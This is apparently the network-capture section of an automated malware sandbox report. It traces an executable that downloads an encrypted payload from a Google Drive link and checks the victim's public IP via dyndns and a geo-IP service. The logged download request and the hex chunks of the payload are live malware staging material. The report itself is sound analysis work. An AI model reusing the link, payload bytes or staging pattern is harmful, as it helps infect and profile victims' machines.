                                                                                Mar 7, 2025 22:44:11.844614029 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.852478027 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.852541924 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.852547884 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.852606058 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.860678911 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.860729933 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.860734940 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.860774040 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.867579937 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.867638111 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.867645025 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.867677927 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.876962900 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.877016068 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.877022028 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.877059937 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.882922888 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.882972002 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.882987976 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.882993937 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.883016109 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.883044004 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.891429901 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.891531944 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.891545057 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.891586065 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.899204016 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.899276018 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.899281979 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.899327040 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.906021118 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.906095982 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.906106949 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.906157017 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.916024923 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.916114092 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.916145086 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.916210890 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.922405958 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.922461033 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.922487020 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.922530890 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.930627108 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.930699110 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.930722952 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.930761099 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.938133001 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.938211918 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.938236952 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.938277960 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.946950912 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.947016001 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.947040081 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.947082996 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.952919960 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.952985048 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.953007936 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.953049898 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.956594944 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.956681967 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.956701040 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.956743956 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.959614992 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.959675074 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.959691048 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.959737062 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.966543913 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.966617107 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.966624022 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.966634989 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.966660023 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.966727972 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.966737032 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.966782093 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.966823101 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.966856003 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.966908932 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:12.278911114 CET4969180192.168.2.8158.101.44.242
                                                                                Mar 7, 2025 22:44:12.283987045 CET8049691158.101.44.242192.168.2.8
                                                                                Mar 7, 2025 22:44:12.284058094 CET4969180192.168.2.8158.101.44.242
                                                                                Mar 7, 2025 22:44:12.284291029 CET4969180192.168.2.8158.101.44.242
                                                                                Mar 7, 2025 22:44:12.289319038 CET8049691158.101.44.242192.168.2.8
                                                                                Mar 7, 2025 22:44:12.902137995 CET8049691158.101.44.242192.168.2.8
                                                                                Mar 7, 2025 22:44:12.911372900 CET4969180192.168.2.8158.101.44.242
                                                                                Mar 7, 2025 22:44:12.916698933 CET8049691158.101.44.242192.168.2.8
                                                                                Mar 7, 2025 22:44:13.069559097 CET8049691158.101.44.242192.168.2.8
                                                                                Mar 7, 2025 22:44:13.082401991 CET49692443192.168.2.8104.21.16.1
                                                                                Mar 7, 2025 22:44:13.082500935 CET44349692104.21.16.1192.168.2.8
                                                                                Mar 7, 2025 22:44:13.082576036 CET49692443192.168.2.8104.21.16.1
                                                                                Mar 7, 2025 22:44:13.085259914 CET49692443192.168.2.8104.21.16.1
                                                                                Mar 7, 2025 22:44:13.085288048 CET44349692104.21.16.1192.168.2.8
                                                                                Mar 7, 2025 22:44:13.116703987 CET4969180192.168.2.8158.101.44.242
                                                                                Mar 7, 2025 22:44:14.632355928 CET44349692104.21.16.1192.168.2.8
                                                                                Mar 7, 2025 22:44:14.632486105 CET49692443192.168.2.8104.21.16.1
                                                                                Mar 7, 2025 22:44:14.636451006 CET49692443192.168.2.8104.21.16.1
                                                                                Mar 7, 2025 22:44:14.636478901 CET44349692104.21.16.1192.168.2.8
                                                                                Mar 7, 2025 22:44:14.636842966 CET44349692104.21.16.1192.168.2.8
                                                                                Mar 7, 2025 22:44:14.641181946 CET49692443192.168.2.8104.21.16.1
                                                                                Mar 7, 2025 22:44:14.688318968 CET44349692104.21.16.1192.168.2.8
                                                                                Mar 7, 2025 22:44:15.078079939 CET44349692104.21.16.1192.168.2.8
                                                                                Mar 7, 2025 22:44:15.078150034 CET44349692104.21.16.1192.168.2.8
                                                                                Mar 7, 2025 22:44:15.078236103 CET49692443192.168.2.8104.21.16.1
                                                                                Mar 7, 2025 22:44:15.085170984 CET49692443192.168.2.8104.21.16.1
                                                                                Mar 7, 2025 22:45:18.070789099 CET8049691158.101.44.242192.168.2.8
                                                                                Mar 7, 2025 22:45:18.071006060 CET4969180192.168.2.8158.101.44.242
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Mar 7, 2025 22:44:04.549715996 CET5503553192.168.2.81.1.1.1
                                                                                Mar 7, 2025 22:44:04.558989048 CET53550351.1.1.1192.168.2.8
                                                                                Mar 7, 2025 22:44:06.970402956 CET6395853192.168.2.81.1.1.1
                                                                                Mar 7, 2025 22:44:06.977683067 CET53639581.1.1.1192.168.2.8
                                                                                Mar 7, 2025 22:44:12.266731977 CET6207853192.168.2.81.1.1.1
                                                                                Mar 7, 2025 22:44:12.273967981 CET53620781.1.1.1192.168.2.8
                                                                                Mar 7, 2025 22:44:13.071512938 CET6283753192.168.2.81.1.1.1
                                                                                Mar 7, 2025 22:44:13.081583023 CET53628371.1.1.1192.168.2.8
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Mar 7, 2025 22:44:04.549715996 CET192.168.2.81.1.1.10xecd1Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:06.970402956 CET192.168.2.81.1.1.10xf13fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:12.266731977 CET192.168.2.81.1.1.10x7096Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:13.071512938 CET192.168.2.81.1.1.10x37feStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Mar 7, 2025 22:44:04.558989048 CET1.1.1.1192.168.2.80xecd1No error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:06.977683067 CET1.1.1.1192.168.2.80xf13fNo error (0)drive.usercontent.google.com142.250.185.97A (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:12.273967981 CET1.1.1.1192.168.2.80x7096No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:12.273967981 CET1.1.1.1192.168.2.80x7096No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:12.273967981 CET1.1.1.1192.168.2.80x7096No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:12.273967981 CET1.1.1.1192.168.2.80x7096No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:12.273967981 CET1.1.1.1192.168.2.80x7096No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:12.273967981 CET1.1.1.1192.168.2.80x7096No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:13.081583023 CET1.1.1.1192.168.2.80x37feNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:13.081583023 CET1.1.1.1192.168.2.80x37feNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:13.081583023 CET1.1.1.1192.168.2.80x37feNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:13.081583023 CET1.1.1.1192.168.2.80x37feNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:13.081583023 CET1.1.1.1192.168.2.80x37feNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:13.081583023 CET1.1.1.1192.168.2.80x37feNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                Mar 7, 2025 22:44:13.081583023 CET1.1.1.1192.168.2.80x37feNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                • drive.google.com
                                                                                • drive.usercontent.google.com
                                                                                • reallyfreegeoip.org
                                                                                • checkip.dyndns.org
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.849691158.101.44.242804664C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Mar 7, 2025 22:44:12.284291029 CET151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Mar 7, 2025 22:44:12.902137995 CET321INHTTP/1.1 200 OK
                                                                                Date: Fri, 07 Mar 2025 21:44:12 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 104
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: a2d52ebcc0baeabb1a8fa2905336c70a
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                Mar 7, 2025 22:44:12.911372900 CET127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Mar 7, 2025 22:44:13.069559097 CET321INHTTP/1.1 200 OK
                                                                                Date: Fri, 07 Mar 2025 21:44:12 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 104
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 91577c7057684d2a395b6ce5d85d4ea3
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.849689142.250.184.2384434664C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-07 21:44:06 UTC216OUTGET /uc?export=download&id=1wr2BieghpXaBqyF8u9_6n0Pi4JbaxcfL HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                Host: drive.google.com
                                                                                Cache-Control: no-cache
                                                                                2025-03-07 21:44:06 UTC1610INHTTP/1.1 303 See Other
                                                                                Content-Type: application/binary
                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                Pragma: no-cache
                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                Date: Fri, 07 Mar 2025 21:44:06 GMT
                                                                                Location: https://drive.usercontent.google.com/download?id=1wr2BieghpXaBqyF8u9_6n0Pi4JbaxcfL&export=download
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                Content-Security-Policy: script-src 'nonce-FEkQBOAytVRFGEqq1tqPFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                Server: ESF
                                                                                Content-Length: 0
                                                                                X-XSS-Protection: 0
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                X-Content-Type-Options: nosniff
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                Connection: close


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.849690142.250.185.974434664C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-07 21:44:08 UTC258OUTGET /download?id=1wr2BieghpXaBqyF8u9_6n0Pi4JbaxcfL&export=download HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                Cache-Control: no-cache
                                                                                Host: drive.usercontent.google.com
                                                                                Connection: Keep-Alive
                                                                                2025-03-07 21:44:11 UTC5016INHTTP/1.1 200 OK
                                                                                X-GUploader-UploadID: AKDAyIvGkHbntERfCMEPcD0A43363KzRgIHcuKRC1BU8BTpw5wibzCCB6WvNQnTv7K-VXNeh
                                                                                Content-Type: application/octet-stream
                                                                                Content-Security-Policy: sandbox
                                                                                Content-Security-Policy: default-src 'none'
                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                X-Content-Security-Policy: sandbox
                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                X-Content-Type-Options: nosniff
                                                                                Content-Disposition: attachment; filename="zItjUFwJFevTeP122.bin"
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Credentials: false
                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 94784
                                                                                Last-Modified: Wed, 12 Feb 2025 06:38:31 GMT
                                                                                Date: Fri, 07 Mar 2025 21:44:11 GMT
                                                                                Expires: Fri, 07 Mar 2025 21:44:11 GMT
                                                                                Cache-Control: private, max-age=0
                                                                                X-Goog-Hash: crc32c=j1VyBA==
                                                                                Server: UploadServer
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                Connection: close
                                                                                2025-03-07 21:44:11 UTC5016INData Raw: 7a 0b af 8f e7 6f 95 1a bd aa 5a aa a8 aa ed 35 f3 0a 99 67 7f a5 9b 7d 57 6e 92 b4 a3 34 70 d3 6a 6c c3 9a 4b a2 c4 a4 c8 a9 9b 28 ca 75 99 54 86 c8 be 68 07 b8 07 7d 3b d6 75 f5 b3 72 d3 94 12 8d cd 91 61 ea 53 de 4b 45 39 f3 6c fa 97 40 39 80 52 78 49 94 16 55 b5 f5 00 2e 1d fa d4 cc 23 14 31 b5 b6 b0 55 ce 7e 12 b8 12 27 ec 87 9b fc c8 bb c3 3f 26 5f 4f bb ed e6 a0 23 33 6c d6 60 fd df e0 b3 34 26 5c d7 10 d4 5e 18 df b1 5b 50 69 95 2f dd ca 6f 92 ed 67 6a 59 6e 79 3f bc bd 5e 10 fe 93 e7 82 81 76 af 80 a6 69 99 54 67 b4 01 e6 86 dd b3 43 83 2d 09 0b 89 1e f4 d4 78 32 b3 c9 1b af af 67 c5 1b 72 d6 b1 f3 d8 4e 6a 62 05 81 01 e8 c1 3a 1f c9 c4 74 87 3e aa d6 f2 3f 3a 16 3f 48 27 a0 7a 58 25 e3 5f 5b fc a7 99 4b bf 4d ce 73 d4 06 f3 74 ed a1 ae 8d 54 38
                                                                                Data Ascii: zoZ5g}Wn4pjlK(uTh};uraSKE9l@9RxIU.#1U~'?&_O#3l`4&\^[Pi/ogjYny?^viTgC-x2grNjb:t>?:?H'zX%_[KMstT8
                                                                                2025-03-07 21:44:11 UTC4665INData Raw: 18 46 00 b4 13 c8 1f 0a 16 c9 e1 99 58 a6 25 c0 ad eb c9 00 74 81 4f c6 ed f2 fe 93 c6 d1 b8 28 ec c8 f5 2e 09 1b a0 3e 7d 87 96 bc f7 f0 27 c5 e4 8e b6 89 dc 46 a2 4e 17 d4 b3 dc 6e b4 e2 90 88 32 0e d7 44 7b 86 49 1f d0 9e 60 a2 9a 1c be 71 48 e4 c3 76 da c5 c9 93 9a 3a fc c1 6a 0d 16 fd b4 a6 e0 64 54 ad 36 19 4c 28 2a 14 0a e7 1c 12 7f 7a ac 56 25 eb 09 8a 58 f4 a5 a5 ad 86 77 02 29 5a da 8f 18 52 73 ab 80 00 05 c5 a6 fe ba c9 dd b8 19 0f 2d 8a bd d0 64 49 ca 98 fb d7 c6 bc da d2 30 67 99 b6 7b 08 d0 c8 10 e1 d3 44 0f 93 69 d5 1d c3 3a 64 3c b2 44 81 40 7d 05 64 8d ce 0d 2c 39 56 dc 99 65 a2 6e 58 0e 78 be 31 67 36 e8 bd 00 3f c7 5c 32 a6 cd 5a 67 98 db 06 23 85 e8 20 c8 3c 34 ef aa 7c 9b 0f 1f 7f 2d 2f 7b 15 8b 7c 2c f5 de 42 f1 8c 84 1c f0 48 da 7b
                                                                                Data Ascii: FX%tO(.>}'FNn2D{I`qHv:jdT6L(*zV%Xw)ZRs-dI0g{Di:d<D@}d,9VenXx1g6?\2Zg# <4|-/{|,BH{
                                                                                2025-03-07 21:44:11 UTC1323INData Raw: e4 ce c6 c9 e0 d6 48 a5 7f 3b c1 53 71 96 26 de 62 b9 7d 5b 75 08 7b 16 bf eb 48 d1 29 65 3f b7 31 39 e9 04 ae e2 f7 20 b2 6e 2a 54 41 fb 7d b1 28 4c 14 7b 23 f2 ca a3 5f 30 3a b0 bf 50 49 44 97 ad 5e b7 04 7c 7f 0c 15 6b d9 30 32 1c 10 78 23 f0 9e a4 c6 69 51 a4 c3 92 cb d5 dc cd 68 e8 d1 2e df 6c 95 0e b7 89 22 98 e9 55 44 e1 0b 77 02 f3 79 0c 78 5f 17 f0 5b cb 0e 93 58 00 f1 a0 78 40 91 34 7c 75 36 b1 70 e4 22 46 f7 7c 79 db 5b 35 8c d4 6d e5 d8 ae 31 a8 90 17 49 c6 26 4d 89 93 b2 2f 1d d6 0a 6e 4a 6e a1 a0 31 91 62 db 14 b5 4f 21 cc de 05 77 83 85 aa 6b 08 fa 91 2e 4d e0 43 8d 51 e2 14 b5 34 fb a9 1e 41 b2 a6 09 86 cf a2 c1 d1 7b 07 4b df a9 23 e6 08 79 8c a5 0d dd 95 a9 44 3d 6d f0 6c 1c da 61 6f 63 74 24 c8 f0 f3 b3 4a 15 dc 51 a6 f4 42 4c d2 8a 1d
                                                                                Data Ascii: H;Sq&b}[u{H)e?19 n*TA}(L{#_0:PID^|k02x#iQh.l"UDwyx_[Xx@4|u6p"F|y[5m1I&M/nJn1bO!wk.MCQ4A{K#yD=mlaoct$JQBL
                                                                                2025-03-07 21:44:11 UTC1378INData Raw: 4a a5 7c 7b e6 1b 4f bb ce 59 c8 8a de cc 0b a0 e5 e9 68 8e a3 bb 77 f5 06 62 5a 28 ea 43 97 92 7f e1 3a 73 b3 e0 14 1f d8 6d bc 71 c3 91 51 db ea 2a ff 80 d4 71 bc 8d 3f f0 5f c6 5d e2 b8 ea 53 d4 45 6d b6 f3 93 03 9d 46 ee 5b 52 78 43 82 e8 57 fe f2 39 a2 1d fa d4 ca 4c c8 31 b5 bc bc 7e ac 6c 10 90 cf 27 ec 8d 96 e1 45 84 c3 3f 27 7a 59 c9 31 f2 a0 d3 91 49 c1 67 8d ad ee b3 86 8d b4 ee da f7 07 d5 8e 47 16 20 13 da 9b af a5 0e 42 a9 10 38 06 1a 17 21 71 ec 65 7b f4 75 95 f7 e9 f4 e3 f2 f4 7b c3 07 37 7b 46 23 e3 f3 b4 5d 8d 77 06 0b 89 1a e5 d0 50 28 f6 c9 11 63 a1 64 c5 ce 1c 8c 02 db 06 4e 6a 68 16 84 10 0d ec a9 c0 cd d7 26 79 28 ce d7 f2 24 5d 17 3f 48 2d a0 a6 36 88 e0 5f 5b f6 a6 89 4b 1f 4e ce 6e d4 3c 64 74 c2 a1 ae 8d 56 23 c7 cc 13 ca 78 18
                                                                                Data Ascii: J|{OYhwbZ(C:smqQ*q?_]SEmF[RxCW9L1~l'E?'zY1IgG B8!qe{u{7{F#]wP(cdNjh&y($]?H-6_[KNn<dtV#x
                                                                                2025-03-07 21:44:11 UTC1378INData Raw: f5 24 7d de 2b 3e 0d e2 5e fb f7 fa 21 a2 63 70 b5 90 d4 46 ac 10 3e db c1 4e 15 a9 92 ff 6f 40 86 d6 6c 31 ae 0e 15 c3 9d 1e 3f 8e e2 b7 62 3c e7 c9 5a d5 a7 55 fc a7 30 ef cc 70 0b 52 69 b4 a6 ea 5e 51 c2 a1 1e 4b 50 32 70 2a 97 73 fa 0c e2 a6 39 c2 f8 01 fe 31 c4 bf a1 af 66 9e 07 59 3c 9d 76 18 52 73 cf 4a 1b 16 bc 9f bd 96 c5 c6 bb 09 48 11 8a bd d0 77 42 f0 98 c2 cd cd aa b5 4c 18 89 93 b6 71 0a d4 a0 21 ec eb a9 25 09 69 c4 1b bd ac fe 2f b6 55 9e 3b ec 1b 64 87 d9 7c 22 37 47 d6 98 a6 b8 6e 22 0e 08 be 31 67 21 16 85 f0 3f c1 56 30 be cd 52 7a 4f c1 06 59 ad b3 26 a7 a8 27 fe b1 6d aa 40 ee 7f 2b 25 b6 17 bf 46 70 07 de 48 e8 31 97 27 b3 5b cd ab 4b 7b 83 dd f1 50 6f 36 5a 5e 8c 35 fa ce e9 c5 62 f2 d2 91 1c c1 39 bd db ef 25 20 0b 3a 12 a8 17 55
                                                                                Data Ascii: $}+>^!cpF>No@l1?b<ZU0pRi^QKP2p*s91fY<vRsJHwBLq!%i/U;d|"7Gn"1g!?V0RzOY&'m@+%FpH1'[K{Po6Z^5b9% :U
